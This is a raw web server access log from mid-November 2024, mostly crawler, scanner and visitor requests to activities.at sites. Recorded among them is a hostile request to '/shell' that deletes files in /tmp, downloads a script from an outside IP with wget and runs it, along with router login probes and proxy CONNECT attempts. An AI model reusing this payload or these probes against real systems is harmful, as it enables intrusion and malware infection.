178.115.42.220 - - [13/Nov/2024:18:43:48 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
194.50.16.198 - - [13/Nov/2024:18:46:40 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 363 "-" "-"
45.202.35.17 - - [13/Nov/2024:18:48:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.140.17.2 - - [13/Nov/2024:18:50:25 +0100] "\x03" 400 383 "-" "-"
154.213.191.23 - - [13/Nov/2024:18:53:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
8.209.214.125 - - [13/Nov/2024:18:56:07 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws" 400 383 "-" "-"
178.215.238.67 - - [13/Nov/2024:18:56:52 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
37.113.52.224 - - [13/Nov/2024:18:57:11 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
156.59.198.136 - - [13/Nov/2024:18:57:43 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-155-fr.doc HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [13/Nov/2024:19:01:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001131003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [13/Nov/2024:19:17:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107081403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:19:21:45 +0100] "GET /ed-test.2web.at/stats/lang/awstats-th.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
48.217.212.12 - - [13/Nov/2024:19:23:29 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
37.113.52.224 - - [13/Nov/2024:19:26:03 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
173.252.83.18 - - [13/Nov/2024:19:27:53 +0100] "GET /robots.txt HTTP/1.1" 404 366 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
194.36.72.50 - - [13/Nov/2024:19:31:31 +0100] "GET / HTTP/1.1" 200 423 "-" "GCore Labs Cyberthreat Research"
95.214.53.91 - - [13/Nov/2024:19:31:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [13/Nov/2024:19:39:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006161203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [13/Nov/2024:19:43:13 +0100] "GET /ed-test.2web.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:19:47:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002131203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.238.67 - - [13/Nov/2024:19:47:31 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
95.214.55.79 - - [13/Nov/2024:19:47:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [13/Nov/2024:19:51:13 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10403618.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:19:55:36 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image137.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
197.48.181.203 - - [13/Nov/2024:19:55:58 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [13/Nov/2024:20:01:59 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961232.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [13/Nov/2024:20:06:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001291403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:20:10:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008101703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
66.240.236.109 - - [13/Nov/2024:20:16:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
35.195.23.184 - - [13/Nov/2024:20:16:53 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.136 - - [13/Nov/2024:20:18:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001211203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [13/Nov/2024:20:19:24 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
46.19.138.234 - - [13/Nov/2024:20:19:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.149.241.14 - - [13/Nov/2024:20:20:22 +0100] "POST / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [13/Nov/2024:20:22:38 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10748488.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
83.77.16.27 - - [13/Nov/2024:20:24:53 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [13/Nov/2024:20:42:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106281803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
62.210.114.63 - - [13/Nov/2024:20:44:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 OPR/86.0.4363.59"
45.140.17.2 - - [13/Nov/2024:20:44:33 +0100] "\x03" 400 383 "-" "-"
173.252.83.15 - - [13/Nov/2024:20:44:52 +0100] "GET /download/file.php?id=256&%3Bsid=9499a0ea86126f6e233484a6eaed9e32 HTTP/1.1" 404 373 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
156.59.198.135 - - [13/Nov/2024:20:46:40 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035099.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
150.107.205.29 - - [13/Nov/2024:20:55:19 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [13/Nov/2024:21:07:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009031503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.191.23 - - [13/Nov/2024:21:11:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [13/Nov/2024:21:16:01 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11629083.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.191.23 - - [13/Nov/2024:21:23:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.50.16.198 - - [13/Nov/2024:21:32:33 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
156.59.198.135 - - [13/Nov/2024:21:37:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12466835.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.178 - - [13/Nov/2024:21:37:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.248 - - [13/Nov/2024:21:49:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
76.77.25.218 - - [13/Nov/2024:21:52:29 +0100] "GET / HTTP/1.1" 200 423 "-" "GCore Labs Cyberthreat Research"
112.74.38.239 - - [13/Nov/2024:22:04:59 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [13/Nov/2024:22:07:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11744291.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [13/Nov/2024:22:15:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10916013.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.191.23 - - [13/Nov/2024:22:16:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.7.248 - - [13/Nov/2024:22:18:19 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [13/Nov/2024:22:18:20 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [13/Nov/2024:22:18:20 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
156.59.198.135 - - [13/Nov/2024:22:19:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12383043.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:22:23:36 +0100] "GET /ed-test.2web.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [13/Nov/2024:22:24:27 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
216.244.66.235 - - [13/Nov/2024:22:25:19 +0100] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
45.140.17.2 - - [13/Nov/2024:22:36:49 +0100] "\x03" 400 383 "-" "-"
216.244.66.235 - - [13/Nov/2024:22:40:42 +0100] "GET /?feed=rss2&page_id=2 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.135 - - [13/Nov/2024:22:41:10 +0100] "GET /ed-test.activities.at/stats/lang/awstats-id.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [13/Nov/2024:22:46:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101271603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [13/Nov/2024:22:46:13 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
37.113.52.224 - - [13/Nov/2024:22:49:11 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
156.59.198.135 - - [13/Nov/2024:22:50:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007230803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.191.23 - - [13/Nov/2024:22:58:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [13/Nov/2024:23:02:07 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11006518.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.178 - - [13/Nov/2024:23:02:18 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [13/Nov/2024:23:06:07 +0100] "GET /ed-test.2web.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.98 - - [13/Nov/2024:23:07:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
114.33.80.184 - - [13/Nov/2024:23:15:30 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
2.57.122.211 - - [13/Nov/2024:23:17:41 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
80.82.77.202 - - [13/Nov/2024:23:19:32 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
80.82.77.202 - - [13/Nov/2024:23:27:33 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
156.59.198.136 - - [13/Nov/2024:23:27:51 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10712440.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.191.23 - - [13/Nov/2024:23:31:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.178 - - [13/Nov/2024:23:36:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [13/Nov/2024:23:39:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006030803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.126.62.141 - - [14/Nov/2024:00:04:04 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
194.50.16.198 - - [14/Nov/2024:00:04:36 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
84.193.131.44 - - [14/Nov/2024:00:12:25 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
185.85.239.13 - - [14/Nov/2024:00:13:00 +0100] "\x16\x03\x01\x01\xaa\x01" 400 383 "-" "-"
185.85.239.13 - - [14/Nov/2024:00:31:24 +0100] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 375 "-" "xfa1"
47.237.115.100 - - [14/Nov/2024:00:31:38 +0100] "\x16\x03\x01" 400 383 "-" "-"
194.50.16.198 - - [14/Nov/2024:00:37:34 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.59.198.135 - - [14/Nov/2024:00:58:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106221503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"